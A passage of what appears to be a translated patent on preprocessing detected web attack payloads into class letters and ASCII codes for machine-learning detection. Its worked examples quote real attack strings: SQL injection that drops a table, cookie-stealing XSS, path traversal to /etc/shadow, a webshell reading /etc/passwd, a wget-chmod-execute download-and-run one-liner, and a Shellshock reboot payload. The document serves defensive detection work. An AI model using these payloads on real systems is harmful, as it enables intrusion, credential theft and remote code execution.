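The continue-or-terminate decision can be sketched as a count of distinct classes. The class assignments below are assumptions chosen to match the two examples ("select" in A Class and "where" in B Class; "http" and "board" both in A Class); the function name `covers_two_classes` is hypothetical.

```python
def covers_two_classes(groups, class_of):
    """True if the selected character groups fall into at least two classes."""
    classes = {class_of[g] for g in groups if g in class_of}
    return len(classes) >= 2

# Assumed class assignments matching the examples in the text.
SQL_CLASS_OF = {"select": "A", "where": "B"}
DOWNLOAD_CLASS_OF = {"http": "A", "board": "A"}

print(covers_two_classes(["select", "where"], SQL_CLASS_OF))      # True: continue
print(covers_two_classes(["http", "board"], DOWNLOAD_CLASS_OF))   # False: terminate
```

Counting distinct classes rather than distinct commands is what prevents two commands from the same class from being treated as a command combination.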

Meanwhile, the plurality of web attack types may include first to n-th web attack types. A k-th web attack type, one of the first to n-th web attack types, may be associated with commands that can be classified into a first class to an n_k-th class, which are at least some of the plurality of classes and are divided according to the components that make up the command combinations belonging to that type. Here, k may be an integer from 1 to n.

If the specific web attack type is the k-th web attack type, then in step S440 the preprocessor 200 may determine whether the plurality of specific character groups correspond to the respective components that make up the specific command combination of the specific web attack type and, if they do, substitute each of the specific character groups with the corresponding one of a specific 1-1 character to a 1-n_k character representing the first class to the n_k-th class. Here, the 1-1 character to the 1-n_k character may be included among the specific first characters. An example is omitted because it would be similar to the examples described above.

Meanwhile, on the assumption that, as shown in FIG. 3, each of the plurality of commands is stored in the database 900 as belonging to at least one of a plurality of classes divided, for each of the plurality of web attack types, according to each component constituting a combination of commands, the results of reconstructing payload data corresponding to specific web attack types through steps S410 to S450 are briefly described below. Here, the second character is assumed to be an ASCII code.

As one example, the payload data SELECT * FROM members; DROP members--, which corresponds to an SQL Injection attack, may be expressed as A*B;C-- through steps S410 to S440. Accordingly, A*B;C-- may be substituted with 65 42 66 59 67 45 45 by means of the ASCII table. Since step S450, which substitutes letters and special characters with ASCII codes, can easily be performed by referring to the ASCII table, it is omitted in the examples below.
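The ASCII substitution of step S450 can be checked with a short sketch. The function name `to_ascii_codes` is a hypothetical helper introduced here for illustration; it simply looks up the code point of each character, which for these characters equals the ASCII code.

```python
def to_ascii_codes(text):
    """Replace each first character and special character with its ASCII code."""
    return [ord(ch) for ch in text]


codes = to_ascii_codes("A*B;C--")
print(" ".join(str(c) for c in codes))  # 65 42 66 59 67 45 45
```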

As one example, the payload data <script>alert('XSS');</script>, which corresponds to an XSS attack, may be expressed as <A>B('');</A> through steps S410 to S440.

As one example, the payload data <script>alert(document.cookie)</script>, which corresponds to an XSS attack, may be expressed as <A>B(C.D)</A> through steps S410 to S440.
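The tokenize, select, substitute, and remove steps behind the XSS examples can be sketched roughly as follows. This is only an illustration under stated assumptions: the class table `XSS_CLASSES`, the regular expression `TOKEN_RE`, and the function `reconstruct` are hypothetical, whitespace is assumed to be discarded, and matching is assumed to be case-insensitive. The actual contents of the database and the exact tokenization rules are not specified here.

```python
import re

# Hypothetical class table for the XSS attack type (illustrative only).
XSS_CLASSES = {"script": "A", "alert": "B", "document": "C", "cookie": "D"}

# One token per run of letters, run of digits, or single special character.
TOKEN_RE = re.compile(r"[A-Za-z]+|[0-9]+|[^A-Za-z0-9\s]")


def reconstruct(payload, classes):
    """Replace stored commands with their class character, keep special
    characters, and drop every other word or number."""
    out = []
    for token in TOKEN_RE.findall(payload):
        key = token.lower()
        if key in classes:
            out.append(classes[key])   # command -> first character of its class
        elif not token.isalnum():
            out.append(token)          # special character is kept as-is
        # remaining words and numbers are removed from the payload
    return "".join(out)


print(reconstruct("<script>alert(document.cookie)</script>", XSS_CLASSES))
print(reconstruct("<script>alert('XSS');</script>", XSS_CLASSES))
```

With the assumed table, the two calls reproduce the strings <A>B(C.D)</A> and <A>B('');</A> given in the examples above.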

As one example, the payload data http://x.x.x.x/bbs/file_download.php?path=../../../../../../../../etc/shadow, which corresponds to a File Download attack, may be expressed as A://...//B_B.C?=../../../../../../../../C/D through steps S410 to S440.

As one example, the payload data http://x.x.x.x/board/dbconn.inc, which corresponds to a File Download attack, may be expressed as A://.../A/B.C through steps S410 to S440.

As one example, the payload data http://x.x.x.x/board/pds/cmd.asp, which corresponds to a File Upload attack, may be expressed as ://.../A//B.C through steps S410 to S440.

As one example, the payload data ?page=file/../../../hackable/uploads/webshell.php.jpg&cmd=cat/etc/passwd, which corresponds to a File Upload attack, may be expressed as ?=/../../..//A/A.B.C&B=C/A/D through steps S410 to S440.

As one example, the payload data http://x.x.x.x/admin.jsp?id=admin&pw=aaaa, which corresponds to an unauthorized access attack, may be expressed as ://.../C.B?A=C&B= through steps S410 to S440.

As one example, the payload data http://x.x.x.x/manager.php?id=admin&pw=aaaa, which corresponds to an unauthorized access attack, may be expressed as ://.../A.B?A=C&B= through steps S410 to S440.

As one example, the payload data cd/tmp;wget http://local.host/2;chmod 777 2;./2', which corresponds to a remote code execution attack, may be expressed as A/B;C://./;D;./' through steps S410 to S440.

As one example, the payload data “GET /us/cgi-bin/webscr HTTP/1.1" 302 26 "-" 0 { :;}; /bin/bash -c \"reboot\"", which corresponds to a remote code execution attack, may be expressed as A//B/C/.""-"{:;};/B/B-\"D\"" through steps S410 to S440.

The embodiments of the present invention described above may be implemented in the form of program instructions executable through various computer components and recorded on a computer-readable recording medium. The computer-readable recording medium may include program instructions, data files, data structures, and the like, alone or in combination. The program instructions recorded on the computer-readable recording medium may be specially designed and configured for the present invention, or may be known to and usable by those skilled in the field of computer software. Examples of computer-readable recording media include magnetic media such as hard disks, floppy disks, and magnetic tape; optical recording media such as CD-ROMs and DVDs; magneto-optical media such as floptical disks; and hardware devices specially configured to store and execute program instructions, such as ROM, RAM, and flash memory. Examples of program instructions include not only machine code such as that produced by a compiler but also high-level language code that can be executed by a computer using an interpreter or the like. The hardware device may be configured to operate as one or more software modules in order to perform the processing according to the present invention, and vice versa.

Although the present invention has been described above with reference to specific matters such as particular components, and to limited embodiments and drawings, these are provided only to aid a more general understanding of the present invention. The present invention is not limited to the above embodiments, and a person of ordinary skill in the art to which the present invention pertains may devise various modifications and variations from this description.

Therefore, the spirit of the present invention should not be confined to the embodiments described above, and not only the claims set forth below but also everything modified equally or equivalently to those claims falls within the scope of the spirit of the present invention.

Claims

A method of generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, wherein,
in a state in which each of a plurality of commands included in the machine learning target system is stored in a database as belonging to at least one of a plurality of classes, the plurality of classes being divided, for each of a plurality of web attack types, according to each component constituting a combination of commands, and each of the plurality of classes being defined by a first character different from those of the other classes, the method comprises:
(a) when payload data is obtained, the payload data being included in security threat data detected by a security threat detection system and the security threat data corresponding to a specific web attack type that is at least one of the plurality of web attack types, performing, by a preprocessor, a process of tokenizing at least some of the characters, special characters, and numbers included in the payload data based on the special characters;
(b) performing, by the preprocessor, a process of selecting, from among the tokenized characters, the tokenized special characters, and the tokenized numbers, a plurality of specific character groups each constituting one of a plurality of commands that are stored in the database and correspond to the specific web attack type;
(c) performing, by the preprocessor, processes of (i) determining whether the plurality of specific character groups correspond to the respective components constituting a specific command combination of the specific web attack type and, if they do, substituting each of the plurality of specific character groups with a specific first character representing the class corresponding thereto, and (ii) removing from the payload data the remainder of the tokenized characters, the tokenized special characters, and the tokenized numbers, other than the plurality of specific character groups and the special characters; and
(d) performing, by the preprocessor, a process of substituting each of the specific first characters and the special characters with a real number or with a second character corresponding to the real number, thereby generating the reconstructed payload data,
wherein, in step (c),
the preprocessor determines whether the plurality of specific character groups, taken in the execution order of the commands corresponding to the payload data, correspond to the respective components constituting the specific command combination of the specific web attack type, and substitutes them with the respective specific first characters representing the classes corresponding thereto.

The method of claim 1, further comprising,
after step (d),
(e) supporting, by the preprocessor, input of the generated reconstructed payload data to a machine learning apparatus.

The method of claim 1, wherein,
in step (c),
the preprocessor (i) determines whether some specific character groups among the plurality of specific character groups correspond to at least one of the components constituting the specific command combination of the specific web attack type and, if they do, substitutes those specific character groups with a specific 1-1 character representing the class corresponding thereto, and then (ii) determines whether the remaining specific character groups among the plurality of specific character groups correspond to the remainder of the components constituting the specific command combination of the specific web attack type and, if they do, substitutes the remaining specific character groups with a specific 1-2 character representing the class corresponding thereto,
and wherein the 1-1 character and the 1-2 character are included in the specific first characters.

The method of claim 1, wherein,
in step (c),
the preprocessor determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and then, if they do, substitutes each of the plurality of specific character groups with a respective one of a 1-1 character and a 1-2 character representing the class corresponding thereto,
and wherein the 1-1 character and the 1-2 character are included in the specific first characters.

The method of claim 1, wherein,
in step (c),
whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type is determined according to whether the plurality of specific character groups are included in at least two of a specific plurality of classes corresponding to the specific command combination of the specific web attack type.

The method of claim 5, wherein
the preprocessor (i) continues the method if the plurality of specific character groups are included in at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, and (ii) terminates the method if the plurality of specific character groups are not included in at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type.

The method of claim 1, wherein
the plurality of web attack types include first through n-th web attack types,
the k-th web attack type corresponds to commands that can be classified into a first class through an n_k-th class, which are at least part of the plurality of classes and are divided according to each component constituting a combination of the commands belonging to the k-th web attack type,
and k is an integer of 1 or more and n or less.

The method of claim 7, wherein,
if the specific web attack type corresponds to the k-th web attack type,
the preprocessor,
in step (c),
determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and, if they do, substitutes each of the plurality of specific character groups with the corresponding one of specific 1-1 through 1-n_k characters representing the first class through the n_k-th class,
and wherein the 1-1 through 1-n_k characters are included in the specific first characters.

The method of claim 1, wherein
the security threat detection system collects a plurality of pieces of detection log data included in the detected security threat data and determines, through the collected detection log data, that the security threat data is of the specific web attack type among the plurality of web attack types.

The method of claim 1, wherein
the first character is a real number or a character that can be substituted with a real number.

The method of claim 1, wherein
the second character is a character that can be used for machine learning.

The method of claim 1, wherein
the first character is a letter of the alphabet, and the second character is an ASCII code.

A preprocessor for generating reconstructed payload data by extracting a web attack pattern based on commands of a machine learning target system, comprising:
a database in which each of a plurality of commands included in the machine learning target system is stored as belonging to at least one of a plurality of classes, the plurality of classes being divided, for each of a plurality of web attack types, according to each component constituting a combination of commands, and each of the plurality of classes being defined by a first character different from those of the other classes;
at least one memory storing instructions; and
at least one processor configured to execute the instructions,
wherein the processor performs: (1) when payload data is obtained, the payload data being included in security threat data detected by a security threat detection system and the security threat data corresponding to a specific web attack type that is at least one of the plurality of web attack types, a process of tokenizing at least some of the characters, special characters, and numbers included in the payload data based on the special characters; (2) a process of selecting, from among the tokenized characters, the tokenized special characters, and the tokenized numbers, a plurality of specific character groups each constituting one of a plurality of commands that are stored in the database and correspond to the specific web attack type; (3) processes of determining whether the plurality of specific character groups correspond to the respective components constituting a specific command combination of the specific web attack type and, if they do, substituting each of the plurality of specific character groups with a specific first character representing the class corresponding thereto, and removing from the payload data the remainder of the tokenized characters, the tokenized special characters, and the tokenized numbers, other than the plurality of specific character groups and the special characters; and (4) a process of substituting each of the specific first characters and the special characters with a real number or with a second character corresponding to the real number, thereby generating the reconstructed payload data,
and wherein the processor,
in process (3),
determines whether the plurality of specific character groups, taken in the execution order of the commands corresponding to the payload data, correspond to the respective components constituting the specific command combination of the specific web attack type, and substitutes them with the respective specific first characters representing the classes corresponding thereto.

The preprocessor of claim 13, wherein
the processor,
after process (4),
further performs (5) a process of supporting input of the generated reconstructed payload data to a machine learning apparatus.

The preprocessor of claim 13, wherein
the processor,
in process (3),
(i) determines whether some specific character groups among the plurality of specific character groups correspond to at least one of the components constituting the specific command combination of the specific web attack type and, if they do, substitutes those specific character groups with a specific 1-1 character representing the class corresponding thereto, and then (ii) determines whether the remaining specific character groups among the plurality of specific character groups correspond to the remainder of the components constituting the specific command combination of the specific web attack type and, if they do, substitutes the remaining specific character groups with a specific 1-2 character representing the class corresponding thereto,
and wherein the 1-1 character and the 1-2 character are included in the specific first characters.

The preprocessor of claim 13, wherein
the processor,
in process (3),
determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and then, if they do, substitutes each of the plurality of specific character groups with a respective one of a 1-1 character and a 1-2 character representing the class corresponding thereto,
and wherein the 1-1 character and the 1-2 character are included in the specific first characters.

The preprocessor of claim 13, wherein,
in process (3),
whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type is determined according to whether the plurality of specific character groups are included in at least two of a specific plurality of classes corresponding to the specific command combination of the specific web attack type.

The preprocessor of claim 17, wherein
the processor
(i) continues the process if the plurality of specific character groups are included in at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type, and (ii) terminates the process if the plurality of specific character groups are not included in at least two of the specific plurality of classes corresponding to the specific command combination of the specific web attack type.

The preprocessor of claim 13, wherein
the plurality of web attack types include first through n-th web attack types,
the k-th web attack type corresponds to commands that can be classified into a first class through an n_k-th class, which are at least part of the plurality of classes and are divided according to each component constituting a combination of the commands belonging to the k-th web attack type,
and k is an integer of 1 or more and n or less.

The preprocessor of claim 19, wherein,
if the specific web attack type corresponds to the k-th web attack type,
the processor,
in process (3),
determines whether the plurality of specific character groups correspond to the respective components constituting the specific command combination of the specific web attack type and, if they do, substitutes each of the plurality of specific character groups with the corresponding one of specific 1-1 through 1-n_k characters representing the first class through the n_k-th class,
and wherein the 1-1 through 1-n_k characters are included in the specific first characters.

The preprocessor of claim 13, wherein
the security threat detection system collects a plurality of pieces of detection log data included in the detected security threat data and determines, through the collected detection log data, that the security threat data is of the specific web attack type among the plurality of web attack types.

The preprocessor of claim 13, wherein
the first character is a real number or a character that can be substituted with a real number.

The preprocessor of claim 13, wherein
the second character is a character that can be used for machine learning.

The preprocessor of claim 13, wherein
the first character is a letter of the alphabet, and the second character is an ASCII code.